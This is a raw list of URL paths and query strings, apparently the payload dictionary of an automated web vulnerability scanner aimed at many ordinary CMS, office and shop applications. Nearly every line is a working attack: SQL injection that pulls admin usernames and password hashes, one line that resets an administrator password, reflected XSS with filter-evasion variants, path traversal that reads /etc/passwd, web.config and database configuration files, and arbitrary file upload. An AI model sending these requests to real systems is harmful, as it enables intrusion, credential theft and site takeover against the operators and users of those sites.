/ProductBuy.asp?UpdateOrder=%E6%9B%B4%E6%96%B0%E9%80%89%E6%8B%A9
/cycle_image.php?language=999%20union%20select%201,2,3,(select%20md5(1122)%20from%20nitc_user%20limit%200,1),5,file,7,8,9,0,1%20from%20nitc_ad%23%5Een
/download.php?tfile=%5C..%5C..%5Cconfig.php
/plugins/phpdisk_client/passport.php?YWN0aW9uPXBhc3Nwb3J0bG9naW4mdXNlcm5hbWU9MSZwYXNzd29yZD0xJnNpZ249NjdBMTAwNDc5QTQ4OTMyOUEzMTIxRUM0QTM2M0FBNzcmdHBmPXBkX3VzZXJzIHdoZXJlIGdpZD0xIGFuZCAoYXNjaWkoc3Vic3RyaW5nKChzZWxlY3QgdXNlcm5hbWUgZnJvbSBwZF91c2VycyB3aGVyZSBnaWQ9MSBsaW1pdCAwLDEpLDEsMSkpPTk4KSBsaW1pdCAwLDEj
/api.php?act=search_sub_regions&api_version=1.0
/index.php?c=com_index&m=yp&userid=12%22%3E%3Ciframe%20src=javascript:alert(42873)%3E
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=4%22%20onmouseover=alert(42873)%20y=&price=&rent_mode=&zone=3363
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=2000_3000%22%20onmouseover=alert(42873)%20y=&rent_mode=&zone=3363
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing%22%20onmouseover=alert(42873)%20y=&m=content&page=&pay_type_int=&price=&rent_mode=&zone=3363
/index.php?a=lists&agent=&bedroom=4_100%22%20onmouseover=alert(42873)%20y=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=&zone=336
/index.php?a=lists&agent=2%22%20onmouseover=alert(42873)%20y=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=&zone=3363
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=2%22%20onmouseover=alert(42873)%20y=&zone=3363
/index.php?m=yp&c=index&a=lists&areaid=37%20%20onmouseover%3Dprompt%2842873%29%20&catid=10&price=1_500&page=1&order=4
/index.php?m=yp&c=index&a=lists&areaid=37&catid=10&price=%22%20onmouseover=prompt(42873)%20&page=1&order=4
/index.php?m=yp&c=index&a=lists&areaid=12&catid=114&price=&tid=1%22%20onmouseover=prompt(42873)%20&page=1&order=1
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=4%20onmonmouseoverouseover=alert(42873)%20y=&price=&rent_mode=&zone=3363
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=2000_3000%20onmonmouseoverouseover=alert(42873)%20y=&rent_mode=&zone=3363
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing%20onmouonmouseoverseover=alert(42873)%20y=&m=content&page=&pay_type_int=&price=&rent_mode=&zone=3363
/index.php?a=lists&agent=&bedroom=4_100%20onmouonmouseoverseover=alert(42873)%20y=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=&zone=336
/index.php?a=lists&agent=2%20onmoonmouseoveruseover=alert(42873)%20y=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=&zone=3363
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=2%20onmoonmouseoveruseover=alert(42873)%20y=&zone=3363
/manage/WAP/Other/AddDalen.aspx?menu=add
/login.php?SSL_CLIENT_S_DN_Email=%27+or+1=%28select+1+from+%28select+count%28*%29,concat%28%28SELECT+md5%281122%29%29,floor%28rand%280%29*2%29%29x+from+information_schema.tables+group+by+x%29a%29%23/wapc/5000_0005_003
/install/step4.aspx
/DataBase/%23zhi_rui_v_Base.mdb
/manage/Shop/profile/LmUserManage.aspx
/API/GetPageHtml.aspx
/stat/stat.aspx?statid=1'%20And%201=(select%20db_name())%20--
/manage/Zone/TemplateList.aspx?OpenerText=a');%7Dalert(42873);%7B//
/msgChat/download.jsp?url=msgChat/download.jsp
/admin.php
/index.php?m=wap&siteid=1&a=big_image&url=aHR0cDovL3hzc3Rlc3QuY29tIiBvbmVycm9yPSJqYXZhc2NyaXB0OmFsZXJ0KDQyODczKTs=
/index/searchInfoTcontentByCategory.action
/emlib4/system/datasource/selectrecordset.aspx
//index.php?app=main&func=common&action=commonJob&act=getAllUserListsInDeptTree&group=getGroupMember
/home.php?action=article&id=1&mytypeId=-2%20union%20select%20concat(0x7e,md5(1122),0x7e)%20from%20v_user%20where%20uid=1
/web/common/getfile.jsp?p=..%5C%5C..%5C%5C..%5C%5C..%5C%5Cetc%5C%5Cpasswd
/ResultXml.aspx?column=banner&table=sys.v_$version%20where%20rownum=1--&k=jwc
/index.php/list-10%20UNION/**/all/**/SELECT/**/listid,listid1,modelid,siteid,norder,ncount,ncountall,(select%20concat(0x23,md5(1122),0x23)%20from%20kc_admin%20where%20adminid=1),klistname,kkeywords,kdescription,kimage,isblank,iscontent,kcontent,klistpath,ktemplatelist1,ktemplatelist2,nlistnumber,kpathmode,ktemplatepage1,ktemplatepage2,npagenumber,ispublish1,ispublish2,norder1,norder3,norder4,norder5,nupdatelist,nupdatepage,isexist,nlist,npage,gid,ismenu1,ismenu2,ismenu3,ismenu4,ismenu5,ismap,klanguage,gidpublish%20from%20king_list%20where%20listid=4%23.html
/index.php?m=video&c=video_for_ck&a=add_f_ckeditor&vid=1&title=1122&description=a%E9%8C%A6%27,0,0,0,0,0,%28select%20%281%29%20from%20mysql.user%20where%201=1%20aNd%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%29%29%23
/customform/CustomFormList.aspx?pageindex=1&divid=530602186870.fs_sys_user%20where%201=(select%20username%20%20from%20fs_sys_user%20where%20id=1);--.1.1
/module/AIP/upload.php?T_ID=1&RUN_ID=1%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/module/sel_seal/get.php?ID=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/ispirit/go.php?LOGIN_UID=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/ispirit/logincheck.php?USEING_KEY=2&USERNAME=abc%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/ispirit/check_secure_key.php?USERNAME=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/interface/auth.php?&PASSWORD=1&USER_ID=%df'%20and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/module/AIP/upload.php?RUN_ID=1&T_ID=1
/general/score/flow/scoredate/result.php?FLOW_ID=11%bf%27%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select%20md5(1122)%20from%20user%20limit%201),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%23
/general/workflow/list/input_form/data_fetch.php?run_id=1%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select%20md5(1122)%20from%20%60user%60%20limit%201),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%23
/pda/auth.php?P=%60%df'and%20(select%201%20from%20%20(select%20count(*),concat((select%20md5(1122)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23&PASSWORD=test
/logincheck.php?USEING_KEY=2&USERNAME=cfreer%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/ispirit/go.php?LOGIN_UID=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/ispirit/check_secure_key.php?USERNAME=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/interface/auth.php?&PASSWORD=1&USER_ID=%df'%20and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/module/sel_seal/get.php?ID=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/portal/group/articl.php?portal_id=3&column_id=3&content_id=184)%20and%20(select%201%20from%20(select%20count(*),concat(0x3a,md5(1122),0x3a)x%20from%20information_schema.tables%20group%20by%20x)a)%20and%20(1)=(1
/index.php?m=company&s=admin/business_info_list
/index.php?case=manage&act=delete&manage=orders&guest=1&id=-1
/getpwd4.asp
/?m=offer&s=offer_list&id=1-webscan%23
/MemberLogin.asp
/views.asp
/basket.asp?h%77_id=513%20and%201=2
/protextbox.asp?hw_%69d=513%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,chr(88),16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%20from%20admin
/index.php?app=tag&ac=add&ts=do
/member/index.php?ugid31=51'%20and%20'1122'='12
/siteserver/cms/console_tableMetadata.aspx?ENName=cms_Content%27%29%20and%200%3C%28select%20top%201%20isnull%28cast%28%5Breer1122%5D%20as%20nvarchar%284000%29%29%2Cchar%2832%29%29%20from%20bairong_Administrator%20where%201%3D1%20and%20UserName%20not%20in%20%28select%20top%200%20UserName%20from%20bairong_Administrator%20where%201%3D1%20group%20by%20UserName%29%29%3B--
/UserCenter/platform/user.aspx?page=2&UnLock=True&UserNameCollection=1')%20and%200%3C(select%20webscan);--
/search.php?mod=information&ids=1-webscan&catid=1
/box.php?
/siteserver/cms/modal_contentTagAdd.aspx?PublishmentSystemID=2109&TagName=1111'%20and%20char(106)=0%20--
/siteserver/UserRole/background_userAdd.aspx?UserName=1122'%20and%20char(106)%20=1%20--&ReturnUrl=../cms/console_user.aspx
//siteserver/cms/background_channelsGroup.aspx?publishmentSystemID=1615&nodeGroupName=1122'%20and%20char(106)%20=1%20--
/siteserver/cms/modal_contentGroupAdd.aspx?PublishmentSystemID=2222&GroupName=123'%20and%20char(106)=1%20--
/downLoadFile.action?filePath=/WEB-INF/web.xml
/siteserver/UserRole/modal_userView.aspx?UserName=dd'%20and%201=char(106);--
/SubmmitOrderHandler.aspx?Action=GetUserShippingAddress&ShippingId=2
/job/job.php?lang=cn&id=2&settings[met_column]=met_admin_table%20where%201=2--%201
/searchLines.aspx?LName=h%25';
/ProductBuy.Asp
/newssearch.aspx?skey=1%25'%20and%201=char(106)%20--
/searchLines.aspx?LName=h&t=webscan()'
/viewlist.aspx?typeid=webscan()'
/company/index.php?datetime=&page=2&position=&profession=&type=1%20and%201=2&workadd=
/resource/avatar/avatar.php?a=uploadavatar&input=uid%3D1122.php
/?mod=account&code=Login_callback&cmd=a&from=../../../robots.txt%00
/admin/admin/getpassword.php?action=next4&abt_type=2&password=123456&passwordsr=123456&array[0]=reer1122
/index.php?index=a&skin=default/../&dataoptimize_html=/../../templates/default/images/css/metinfo.css
/gallery--p,0,1122%20and%200-0---1.html
/?m=info.detail&id=1-webscan
/misc.php?mod=getuserinfo&uid=-1
/?m=city.getSearch&index=reer
/?m=info&rewrite=1'%20union%20select%201,concat(0x23,md5(1122),0x23)%20from%20my_admin%20where%20id=1%20--%20a
/admin_aspcms/_content/_Spec/AspCms_SpecAdd.asp
/index.php?act=ajax&do=datacall&in_ajax=1&m=index&op=get_datacall
/Product.asp
/user/getpassword.asp
/admin_aspcms/_expand/_form/AspCms_FormFun.asp?action=del&FormField=reer&id=1122
/plus/ajax_user.php?act=check_email
/plus/ajax_user.php?act=check_usname
/HitCount.asp?LX=reer%20where%201=1%20union%20select%20Password%20from%20Admin
/ScoreProductSearchList.html?ProductCategoryID=12%20and%20%20@@version=1%20--
/ScoreProductSearchList.aspx?ProductCategoryID=12&Score1=2&Score2=3%20and%20char(106)=1%20--
/ScoreProductSearchList.aspx?ProductCategoryID=12&Score1=3%20and%20char(106)=1%20--
/index.php?app=user&ac=plugin&in=../../robots.txt%00
/member.php?act=login&op=forget
/item.php?act=search&keyword=%d5'%20and(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20distinct%20concat(0x7e,0x27,char(99,102,114,101,101,114),0x27,0x7e)%20FROM%20information_schema.schemata%20LIMIT%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1%23&searchsort=subject&catid=0&ordersort=addtime&ordertype=asc&searchsubmit=yes
/?product-75-1@%7C1122%22%3E%3Ciframe%20src=javascript:this[%22%5Cx61%5Cx6c%5Cx65%5Cx72%5Cx74%22](%2242873%22)%20-index.html
/index.php?product-%22%3E%3Ciframe%20src=javascript:window[%22%5Cx61%5Cx6c%5Cx65%5Cx72%5Cx74%22](42873)%20-1122-viewpic.html
/?gallery-1--1--'%20%3E%3Ciframe%20src=javascript:window[%22%5Cx61%5Cx6c%5Cx65%5Cx72%5Cx74%22](42873)%20'--grid.html
/index.php?act=show_groupbuy&op=groupbuy_list&groupbuy_area=&groupbuy_class=&groupbuy_price=1&groupbuy_order_key=price&groupbuy_order=asc,%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),%20md5(1122))a%20from%20information_schema.tables%20group%20by%20a)b);%23
/index.php?act=search&key=click&order=desc,%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),%20md5(1122))a%20from%20information_schema.tables%20group%20by%20a)b);%23&cate_id=8
/wap/index.php
/deals?end_time=1&searchName=%25'%20AND%201=1%20AND%20'%25'='&start_time=1
/statistics.php?pageurl=pageurl&referer=http://www.baidu.com/?wd=aaaa%2527),((select%201%20from%20(select%20count(*),concat(version(),0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a),2,3,4,5,6,7,8,9)%23
/member/index.php
/wap/index.php?mod=space&userid=1'%20and%20extractvalue(1,(select%20md5(1122)from%20my_admin%20limit%201));%20%23
/index.php?act=index&op=list&city_id=1&area_id=&mall_id=&class_id=3&class_id_1=22&pconsume=&orderby=add_time%20asc,%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),%20md5(1122))a%20from%20information_schema.tables%20group%20by%20a)b);%23&sort=asc
/video.php
/news.php?classid=2
/ajax.php?action=dig&module=members%20set%20username=00000,password=0x3235306366386235316337373366336638646338623462653836376139613032%20where%20uid=1%20--%20a
/count.php?type=news%20SET%20views%20=%20views-1%20WHERE%20id=1%20and%201=(updatexml(1,concat(0x5e24,(select%20concat(0x3a,md5(1122),0x3a)%20from%20boka_members%20where%20uid=1),0x5e24),1))--+&&action=showcount&id=1
/ajax.php?action=contentpage
/comments.php?id=3a&tablepre=boka_ckck
/rss.php?module=news&attasql=union%20select%201,reer,3,4%20from%20boka_members%20where%20uid=1%20order%20by%20id%20asc%20%20--%20a
//wap/board.php?filter=3%20union%20select%201,2,3,4,webscan,6,7,8,9,10,11,cfreer,13,14,15,16,17,18,19,20,21,22%20from%20boka_members%20where%20uid=1%20--%20a&classid=1a&digest=1
/admin/index.php?_m=../template/css/login.css%00&_a=admin_list
/case/?settings[met_img]=met_admin_table%20where%201=1%20--%201
/login.aspx?test=TestSystem&password=1122&oid=2%20and%202=(convert(int,char(106)))&uid=1
/info.php?fid=1&tblprefix=cms_msession%20and%201=reer%20--
/ajax.php?action=letter&letter=a
/index.php?q=1%25%2527%2520and%25201%253D2%2520%2523&do=search&action=lists&module=product
/index.php?action=detail&do=offer&title=%2527or%25201%253D2%2523
/index.php/Index/index/name/$%7B@print(md5(1122))%7D
/index.php?m=news&s=admin/newslist&submit=%E5%88%A0%E9%99%A4&did=999%29%20and%20%28SELECT%201%20from%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28select%28selEct%20concat%28user,0x7c,password%29%20from%20f10bd198561acb0197452013b7a82429%20limit%200,1%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%23
/index.php?m=payment&s=admin/pickupmod
/admin/receive.php?signMsg=0FEBF34C4A2EBF825F60025D6C0576F2&version=%3Cobject%20data=data:text/html;base64,PHNjcmlwdD5hbGVydCg0Mjg3Myk8L3NjcmlwdD4=%3E
/user/City_ajax.aspx?Cityid=-1'%20%20union%20%20SELECT%20'webscan',2%20FROM%20fs_sys_User%20WHERE%20id=7%20%20and%20'1'='1
/servlet/ShowPic?filePath=/tomcat/webapps/ROOT/WEB-INF/web.xml
/mep-admin/DcServlet
/mep-admin/userAction!queryUser.action?start=0&limit=10
/admin/picupload.aspx
/manager/picupload.aspx
/microshop/index.php?act=api&op=get_personal_commend&data_count=1%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,concat(0x7c,md5(1122),0x7c),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46%20from%20shopnc_admin
/TreeDialogController.zc?backId=buyer_id_0&backName=buyer_name_0&dialogType=radio&method=getBuyerDialog&tempBackId=temp_buyur_id_0&tempBackName=temp_buyer_name_0
/admin.php?c=ajax&f=exit&filename=opt&group_id=1%20union%20select%203,1,0,md5(1122),account,6%20from%20qinggan_adm%20where%20id%20like%201%23&identifier=1
/index.php?c=tj&f=include&js=/../../config.php
/index.php?c=ueditor&f=remote_image&upfile=http://0.0.0.0/reer.php
/api.php?c=opt&f=index&group_id=-1%20union%20select%201,2,0,md5(1122),5,6&identifier=reer
/radcontrols/editor/dialog.aspx?dialog=ImageManager&editorID=');%3C/script%3E%3CScRiPt/acu%20src=1%20onerror=alert(42873)%3E%3C/ScRiPt%3E%3Cscript%3E//&language=zh_CN&sessionID2=8ca6abaf-d361-328c-9178-%20f78311cd0329&UseEmbeddedScripts=yes&useSession=0
/system/nhome/login.jsp?message=%22)--%3E%3C/script%3E%3Cscript%3Ealert(42873)%3C/script%3E
/cgi/index.cgi?error=badlogin&__mode=show_login%27%22%28%29%26%25%3CScRiPt%20%3Ealert%2842873%29%3C%2fScRiPt%3E
/
/styles/outlook1/tools/calendar/calEditEvent.php?action=edit%22%3E%3Cscript%3Ealert(42873)%3C/script%3Ebad=%22&calid=
/web/User_Sort_List.aspx?infoid=2%20and%20char(106)=0
/forgetbf.asp?errstr=--%3E%3C/script%3E%3Cscript%3Ealert(42873)%3C/script%3E
/Ajax_Handle/UploadAttachmentHandler.ashx
/Web/Exam_List.aspx?typeid=18%20or%20(char(106)=0)
/Ajax_Handle/UploadPictureHandler.ashx
/Ajax_Handle/UploadLocalVideoHandler.ashx
/index.php?m=api&a=userpreview
/index.php?m=Appmanager&a=loadapp
/CMSUploadFile.aspx
/api/shop.aspx
/sysinfo.jsp
/login/Log.aspx?loginname=/**/'/**/and/**/char(106)%3E0/**/--
/login/publicpage.aspx?infotype=InfoZWGK_zwgk'/**/and/**/char(106)%3E0/**/--&dic_name=
/file/MyDownLoad.ashx?path=../web.config
/file/PackagDownload.ashx?sessionId=../../../../../webscan.txt
/broadcast/displaynewspic.aspx?id=1/**/and/**/1=char(106)/**/
/feedback/processvalue.aspx?num=e'/**/and/**/char(106)%3E0%20--
/channel/QueryHig.aspx?AcceptDept=&AppBusinessName='/**/and/**/char(106)%3E0/**/%20--%20
/login/proexamineview.aspx?ActivityInstanceId='/**/and/**/user/**/%3E0/**/--
/api.php?op=video_api&pc_hash=test%22/%3Ec%3Cscscriptript%3Ealert(42873)%3C/scscriptript%3E&&do_complete=1&uid=1&snid=1
/FileDownloadServlet?websiteId=1&templateName=/&fileNames=../../WEB-INF/config/db/dataSource.xml
/setup/setup1.jsp
/examlist/id-12,pid-104,key-%27and(char(106)=0)or%271%27=%27.aspx
/Article/?Type=18%20/**/and/**/1=char(106)--
/login/TransactList.aspx?ItemName='/**/and/**/1=char(106)/**/--
/file/EmailDownload.ashx?url=~/web.config&name=web.config
/file/UDFDownLoad.ashx?path=~/Global.asax&name=Global.asax
/file/DownLoad.ashx?path=~/Routes.config
/file/FileUpload.asmx/UploadFileBase64?url=~/Content/cesi.aspx&data=VGhpcyBpcyBhIHRlc3QgLSBieSBjZnJlZXIgd2Vic2Nhbg%3D%3D&status=0
/file/FileUpload.asmx/CopyFile?sourcePath=/web.config&targetPath=/Content/reer.txt&overwrite=true
/download.jsp?path=WEB-INF/&name=web.xml
/page/upload/down_file.jsp?fileName=ljer.gif'%20or%20'1'='2
/mx_form/order_save.php
/index.php?app=tag&ac=add&ts=do
/member.php?act=index
/Article/?KeyWord=1'%20and%201=char(97)%20--
/apas/portal/tableDownload/download.jsp?tmpfilename=../index.jsp
/admin/payonline.php?act=login&table=information_schema.SCHEMATA%20where%201=(select%201%20from%20%20(select%20count(*),concat(version(),0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/frame/help/read_help.php?HELP_ID=-1%20union%20select%201,2,3,concat(0x7c,md5(1122),0x7c),5,6
/Channel/SearchResult.aspx?ItemName=1'%20or%201%3Echar(106)%20--
/Broadcast/Broadcast.aspx?type='%20or%201=char(106)%20--
/Broadcast/BroadcastView.aspx?type=InfoTPXW&InfoId=1122'%20and/**/1=char(106)--
/Channel/ChannelList.aspx?a=a&LicenseType=2'%20and/**/1=char(106)--
/jvideo/down.jsp?pathfile=/WEB-INF/ini/merpserver.ini%00.flv
/jiep/down.jsp?pathfile=down.jsp%00.txt
/index.php?m=Goods&a=showcate&id=1'cfreer
/Goods-showcate-id-1.html'cfreer
/pages/search_disk_usage.php?archive=a'%20and%20(SELECT%201%20FROM%20(select%20count(*),concat(floor(rand(0)*2),(SELECT%20md5(1122)%20from%20user%20limit%200,1))a%20from%20information_schema.tables%20group%20by%20a)b)%20and%20'1'='1
/jvideo/objectbox/selectx_userlist.jsp
/yhzc/NewFile.jsp?loginname=admin'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
/yhzc/isPass.jsp?id=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
/yhzc/isFlag.jsp?loginname=admin'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
/Bulletin/Businessview.aspx?infoFlowId=0'%20and/**/1=char(106)%20--
/Bulletin/ColumnList.aspx?LanMuId=1'%20and/**/1=char(106)%20--
/Channel/TableDownLoadList.aspx?deptid=0011')%20and/**/1=char(106)--
/celerityAlleywayDetail.do?type=7'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
/Bulletin/DocmentDownload.aspx?ID=1122'%20and/**/1=char(106)--
/ViewSource/SrcStencilList.aspx?listType=1&SerailNO=11xxxxxxxx&buqiId=22&infoflowId=1122'%20and/**/1=char(106)--
/ViewSource/ProExamineView.aspx?ActivityInstanceId=0&ActivitySchemeGuid=00000000-0000-0000-0000-00000000000'--
/burgherServiceDetail.do?bs=1&serviceType=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'1122'='1122
/yushouli/yushouliResult.do?item_ID=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'1122'='1122
/indexGetDatags.do?depNO=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'1122'='1122
/bqbzDetail.do?id=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'1122'='1122
/counter/counter2.php?id=(select%201%20from%20(select%20count(*),concat((select(select%20concat(cast(concat(0x7e,md5(1122))%20as%20char),0x7e))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)
/oa_server/App_Pages/App_page/UserSpuerAdd.aspx
/oa_server/App_Pages/App_page/user_list.aspx
/cms/cms/site/cms_site_template_upload.jsp?action=save
/cai_study.asp?FN=cai/test.flv&cls_no=&cai_no=lzgy&stu_no=1122'%20and%201=char(106);--
/deptProceedingDetailnew.do?itemtype=6&depNO=1122'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'1122'='1122&approveName=&nowPage=3
